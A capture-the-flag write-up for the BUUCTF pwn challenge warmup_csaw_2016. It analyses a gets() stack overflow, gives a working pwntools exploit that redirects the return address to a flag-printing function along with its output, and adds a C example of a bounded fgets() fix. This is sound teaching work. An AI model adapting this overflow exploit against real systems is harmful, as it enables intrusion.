• BUUCTF PWN Walkthrough 03 - warmup_csaw_2016


    warmup_csaw_2016

    • 1.file
    root@kali:~/Downloads# file warmup_csaw_2016
    warmup_csaw_2016: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=7b7d75c51503566eb1203781298d9f0355a66bd3, stripped
    

    64-bit program.

    • 2.checksec
    root@kali:~/Downloads# checksec warmup_csaw_2016
    [*] '/root/Downloads/warmup_csaw_2016'
        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX disabled
        PIE:      No PIE
    

    No protections enabled (no stack canary, NX disabled, no PIE).

    • 3.IDA
    __int64 __fastcall main(__int64 a1, char **a2, char **a3)
    {
      char s; // [rsp+0h] [rbp-80h]
      char v5; // [rsp+40h] [rbp-40h]   0x40 bytes below the saved rbp
    
      write(1, "-Warm Up-\n", 0xAuLL);
      write(1, "WOW:", 4uLL);
      sprintf(&s, "%p\n", sub_40060D);   // prints the address of sub_40060D
      write(1, &s, 9uLL);
      write(1, ">", 1uLL);
      return gets(&v5, ">");             // unbounded read into v5: stack buffer overflow
    }
    

    Running it:

    root@kali:~/Downloads# ./warmup_csaw_2016 
    -Warm Up-
    WOW:0x40060d
    >12
    

    Looking at sub_40060D:

    int sub_40060D()
    {
      return system("cat flag.txt");
    }
    

    This function can be used as the return target.

    Building the exploit:

    #!/usr/bin/python3
    #coding=utf-8
    
    from pwn import *
    
    port = 25397
    p = remote('node3.buuoj.cn',port)
    
    # 0x40 bytes fill v5 (rbp-0x40), 8 more bytes overwrite the saved rbp,
    # then the return address is replaced with sub_40060D (0x40060d)
    payload = b'a'*0x40 + b'b'*8 + p64(0x40060d)
    
    p.sendline(payload)
    
    p.interactive()
    

    Exploit output:

    root@kali:~/Downloads# python3 exp_warmup_csaw_2016.py
    [+] Opening connection to node3.buuoj.cn on port 25397: Done
    [*] Switching to interactive mode
    -Warm Up-
    WOW:0x40060d
    >flag{7fe33307-500a-42af-a7a6-b9a039f20b8f}
    timeout: the monitored command dumped core
    [*] Got EOF while reading in interactive
    $  
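
    As an added example (not part of the original writeup or the challenge binary), here is the unbounded gets() read from main() next to a bounded fgets() replacement. A sentinel field stands in for the saved rbp so the code can show that an over-long line no longer reaches it. BUF_SIZE, struct frame_like, read_line_bounded, feed_line and the demo functions are all names constructed for this example; the over-long input copies the shape of the writeup's 0x40 + 8 + 8 payload and the short input is the "12" typed in the run above.

```c
#include <stdio.h>
#include <string.h>

/* Mirrors the 0x40-byte buffer v5 at rbp-0x40 in the decompiled main(). */
#define BUF_SIZE 0x40

/* Stand-in for the stack frame (constructed for this example, not the
 * binary's real layout): the line buffer followed by a sentinel sitting
 * where the saved rbp would be. Any overrun of buf changes the sentinel. */
struct frame_like {
    char buf[BUF_SIZE];
    unsigned long long sentinel;
};
#define SENTINEL 0x4242424242424242ULL

/* Bounded replacement for the gets(&v5) call: gets() takes no length and
 * keeps copying until a newline, which is the whole bug. fgets() stops after
 * size-1 bytes and always NUL-terminates; we strip the newline and, if the
 * line was longer than the buffer, discard the rest so it cannot spill into
 * the next read. Returns the stored length, or -1 on EOF/error. */
long read_line_bounded(char *buf, size_t size, FILE *in)
{
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
    } else {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (long)len;
}

/* Writes line to a temporary stream and reads it back into f->buf the way
 * main() reads stdin. Returns the stored length, or -1 on failure. */
long feed_line(const char *line, struct frame_like *f)
{
    FILE *in = tmpfile();
    if (in == NULL)
        return -1;
    fputs(line, in);
    rewind(in);
    f->sentinel = SENTINEL;
    long n = read_line_bounded(f->buf, sizeof f->buf, in);
    fclose(in);
    return n;
}

/* Constructed input with the shape of the writeup's payload: 0x40 filler,
 * 8 bytes aimed at the saved rbp, 8 bytes aimed at the return address.
 * Returns 1 when the read stayed inside buf (63 bytes kept, NUL-terminated,
 * sentinel untouched) and stores the length in *stored_len. */
int demo_overlong_line(long *stored_len)
{
    char line[0x50 + 2];
    memset(line, 'a', 0x40);
    memset(line + 0x40, 'b', 8);
    memset(line + 0x48, 'c', 8);
    line[0x50] = '\n';
    line[0x51] = '\0';

    struct frame_like f;
    long n = feed_line(line, &f);
    if (stored_len)
        *stored_len = n;
    return n == BUF_SIZE - 1 && f.buf[BUF_SIZE - 1] == '\0'
           && f.sentinel == SENTINEL;
}

/* The benign "12" input from the writeup: stored as-is, newline removed.
 * Returns 2 on success, -1 otherwise. */
long demo_short_line(void)
{
    struct frame_like f;
    long n = feed_line("12\n", &f);
    return (n == 2 && strcmp(f.buf, "12") == 0 && f.sentinel == SENTINEL) ? n : -1;
}

int main(void)
{
    long n = 0;
    int ok = demo_overlong_line(&n);
    printf("over-long line: stored %ld bytes, sentinel intact: %s\n",
           n, ok ? "yes" : "no");
    printf("short line: %ld\n", demo_short_line());
    return ok ? 0 : 1;
}
```

    The design point is that the size passed to fgets() is taken from the buffer itself (sizeof f->buf), so the bound and the allocation cannot drift apart; draining the rest of an over-long line matters too, otherwise the leftover bytes would be returned by the next read.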
    

    The above is my personal approach to this challenge; everyone is welcome to discuss and learn from it.

  • Original article: https://www.cnblogs.com/moke-cn/p/14297924.html
Copyright © 2020-2023  润新知